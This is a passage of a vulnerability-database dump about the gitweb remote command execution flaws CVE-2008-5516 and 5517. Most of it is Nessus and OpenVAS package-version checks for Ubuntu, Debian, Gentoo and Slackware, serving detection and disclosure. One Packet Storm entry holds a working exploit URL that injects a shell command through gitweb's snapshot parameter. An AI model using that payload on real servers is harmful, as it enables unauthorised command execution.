ereg(pattern:\"^(6\\.06|7\\.10|8\\.04|8\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 7.10 / 8.04 / 8.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-arch\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-core\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-cvs\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-doc\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-email\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-svn\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"gitk\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-arch\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-core\", pkgver:\"1:1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-cvs\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-daemon-run\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-doc\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-email\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-gui\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-p4\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-svn\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"gitk\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"gitweb\", pkgver:\"1:1.5.2.5-2ubuntu0.1\")) flag++;\nif 
(ubuntu_check(osver:\"8.04\", pkgname:\"git-arch\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-core\", pkgver:\"1:1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-cvs\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-daemon-run\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-doc\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-email\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-gui\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-svn\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"gitk\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"gitweb\", pkgver:\"1:1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-arch\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-core\", pkgver:\"1:1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-cvs\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-daemon-run\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-doc\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-email\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-gui\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-svn\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"gitk\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"gitweb\", pkgver:\"1:1.5.6.3-1.1ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity 
: SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git-arch / git-core / git-cvs / git-daemon-run / git-doc / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:07", "bulletinFamily": "exploit", "description": "", "modified": "2010-02-19T00:00:00", "published": "2010-02-19T00:00:00", "href": "https://packetstormsecurity.com/files/86450/gitWeb-1.x-Remote-Command-Execution.html", "id": "PACKETSTORM:86450", "type": "packetstorm", "title": "gitWeb 1.x Remote Command Execution", "sourceData": "` \n \n# Exploit Title: gitWeb remote command execution \n# Date: 2009.06.19 \n# Author: S2 Crew [Hungary] \n# Software Link: - \n# Version: GIT 1.X \n# Tested on: debian linux, GIT 1.5.2 \n# CVE: CVE-2008-5516 - CVE-2008-5517 \n \n# Code: \n \nhttp://target/cgi-bin/gitweb2.cgi?p=workspace/.git;a=snapshot;f=.svn/prop-base/CHANGELOG.svn-base;h=7b57b302a4f016c8afdce6dc2df9e831460ccd82|`touch$IFS/tmp/aap`|;hb=10b50960665569a2e8b9588d60a66303c8e359f2 \n \n \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/86450/gitweb-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:56:31", "bulletinFamily": "scanner", "description": "The remote host is missing an update to git-core\nannounced via advisory DSA 1708-1.", "modified": "2017-07-07T00:00:00", "published": "2009-01-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63222", "id": "OPENVAS:63222", "title": "Debian Security Advisory DSA 1708-1 (git-core)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1708_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1708-1 (git-core)\n#\n# Authors:\n# Thomas Reinke 
<reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that gitweb, the web interface for the Git version\ncontrol system, contained several vulnerabilities:\n\nRemote attackers could use crafted requests to execute shell commands on\nthe web server, using the snapshot generation and pickaxe search\nfunctionality (CVE-2008-5516).\n\nLocal users with write access to the configuration of a Git repository\nserved by gitweb could cause gitweb to execute arbitrary shell commands\nwith the permission of the web server (CVE-2008-5517).\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.4.4.4-4+etch1.\n\nFor the unstable distribution (sid) and testing distribution (lenny),\nthe remote shell command injection issue (CVE-2008-5516) has been fixed\nin version 1.5.6-1. 
The other issue will be fixed soon.\n\nWe recommend that you upgrade your Git packages.\";\ntag_summary = \"The remote host is missing an update to git-core\nannounced via advisory DSA 1708-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201708-1\";\n\n\nif(description)\n{\n script_id(63222);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-20 22:42:09 +0100 (Tue, 20 Jan 2009)\");\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1708-1 (git-core)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res 
= isdpkgvuln(pkg:\"git-doc\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:33", "bulletinFamily": "scanner", "description": "The remote host is missing an update to git-core\nannounced via advisory DSA 1708-1.", "modified": "2018-04-06T00:00:00", "published": "2009-01-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063222", "id": "OPENVAS:136141256231063222", "title": "Debian Security Advisory DSA 1708-1 (git-core)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1708_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1708-1 (git-core)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that gitweb, the web interface for the Git version\ncontrol system, contained several vulnerabilities:\n\nRemote attackers could use crafted requests to execute shell commands on\nthe web server, using the snapshot generation and pickaxe search\nfunctionality (CVE-2008-5516).\n\nLocal users with write access to the configuration of a Git repository\nserved by gitweb could cause gitweb to execute arbitrary shell commands\nwith the permission of the web server (CVE-2008-5517).\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.4.4.4-4+etch1.\n\nFor the unstable distribution (sid) and testing distribution (lenny),\nthe remote shell command injection issue (CVE-2008-5516) has been fixed\nin version 1.5.6-1. 
The other issue will be fixed soon.\n\nWe recommend that you upgrade your Git packages.\";\ntag_summary = \"The remote host is missing an update to git-core\nannounced via advisory DSA 1708-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201708-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63222\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-20 22:42:09 +0100 (Tue, 20 Jan 2009)\");\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1708-1 (git-core)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n 
report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:22", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-15.", "modified": "2018-04-06T00:00:00", "published": "2009-03-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063546", "id": "OPENVAS:136141256231063546", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-15 (git)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in gitweb allow for remote execution of arbitrary\ncommands.\";\ntag_solution = \"All git users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-util/git-1.6.0.6'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-15\nhttp://bugs.gentoo.org/show_bug.cgi?id=251343\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-15.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63546\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200903-15 (git)\");\n\n\n\n 
script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-util/git\", unaffected: make_list(\"ge 1.6.0.6\"), vulnerable: make_list(\"lt 1.6.0.6\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:51:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-051-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63428", "id": "OPENVAS:63428", "title": "Slackware Advisory SSA:2009-051-02 git", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_051_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New git packages are available for Slackware 12.0, 12.1, 12.2, and -current to\nfix security issues.\n\nThere are other security issues related to gitweb, which Slackware does not\nship, but could be added to a Slackware install. 
These problems are also\nfixed with this update.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2009-051-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-051-02\";\n \nif(description)\n{\n script_id(63428);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2008-3546\", \"CVE-2008-5516\", \"CVE-2008-5517\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2009-051-02 git \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:27", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-15.", "modified": "2017-07-07T00:00:00", "published": "2009-03-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63546", "id": "OPENVAS:63546", "title": "Gentoo Security Advisory GLSA 200903-15 (git)", "type": "openvas", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in gitweb allow for remote execution of arbitrary\ncommands.\";\ntag_solution = \"All git users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-util/git-1.6.0.6'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-15\nhttp://bugs.gentoo.org/show_bug.cgi?id=251343\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-15.\";\n\n \n \n\nif(description)\n{\n script_id(63546);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200903-15 (git)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-util/git\", unaffected: make_list(\"ge 1.6.0.6\"), vulnerable: make_list(\"lt 1.6.0.6\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-051-02.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231063428", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063428", "title": "Slackware Advisory SSA:2009-051-02 git", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_051_02.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
